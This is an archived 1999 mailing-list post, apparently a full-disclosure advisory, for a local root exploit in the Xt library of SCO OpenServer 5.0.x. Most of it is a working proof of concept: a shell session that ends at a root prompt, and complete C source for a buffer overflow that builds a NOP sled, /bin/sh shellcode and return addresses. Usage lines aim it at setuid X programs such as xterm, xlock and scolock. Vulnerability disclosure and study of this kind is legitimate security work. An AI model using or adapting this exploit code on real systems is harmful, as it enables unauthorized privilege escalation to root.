Date: Tue, 14 Sep 1999 15:42:52 -0500
From: Brock Tellier <[email protected]>
To: [email protected]Subject: SCO 5.0.x Xt lib exploit
Greetings,
As I mentioned in an earlier post, virtually all of SCO's programs
using the Xt library are vulnerable to a local root exploit. The proofs
of concept follow:
They all go something like this:
scobox:/tmp_mnt/home/btellier$ uname -a
SCO_SV scobox 3.2 5.0.5 i386
scobox:/tmp_mnt/home/btellier$ id
uid=136(btellier) gid=100(devel) groups=100(devel),998(www)
scobox:/tmp_mnt/home/btellier$ xmcd -bg `./sco_xt -9000 2200`
Generic SCO Xt library overflow program
By Brock Tellier [email protected]
using jmp addr: 0x8047878
Warning: Color name
...
...
Warning: some arguments in previous message were lost
#
--- cut ---
/*
* Generic SCO Xt library overflow program by Brock Tellier
[email protected]
* Tested on SCO 5.0.5+Skunkware98
* All programs using the Xt library are believed vulnerable
*
Compile gcc -o sco_xt sco_xt.c
Usage: /usr/bin/X11/scolock -bg `./sco_xt -9000 2000`
/usr/bin/X11/xmcd -bg `./sco_xt -8500 2000`
/usr/bin/X11/xlock -bg `./sco_xt -8500 2000`
/usr/bin/X11/xterm -bg `./sco_xt -9000 2000`
* NOTE: xscreensaver and xload are vulnerable to the overflow but drop
* privs before the overflow occurs. Of course, they were suid auth so
that
* they could read /etc/shadow and thus your shellcode could exploit
something
* along those lines. I got shells out of them by doing:
/usr/bin/X11/xscreensaver -bg `./sco_xt -8404 2200`
/usr/bin/X11/xload -bg `./sco_xt -8404 2200`
*/
#include <stdlib.h>
#include <stdio.h>
char scoshell[]= /* [email protected] */
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define LEN 10000
#define NOP 0x90
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[]) {
long int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];
if(argc < 3) {
fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
exit(0);
}
else {
offset=atoi(argv[1]);
buflen=atoi(argv[2]);
}
addr=get_sp();
fprintf(stderr, "Generic SCO Xt library overflow program\n");
fprintf(stderr, "By Brock Tellier [email protected]\n\n");
fprintf(stderr, "Using addr: 0x%x\n", addr-offset);
memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
for(i=((buflen/2) + strlen(scoshell))+4;i<buflen-4;i+=4)
*(int *)&buf[i]=addr-offset;
for(i=0;i<buflen;i++)
putchar(buf[i]);
exit(0);
}
--- cut ---
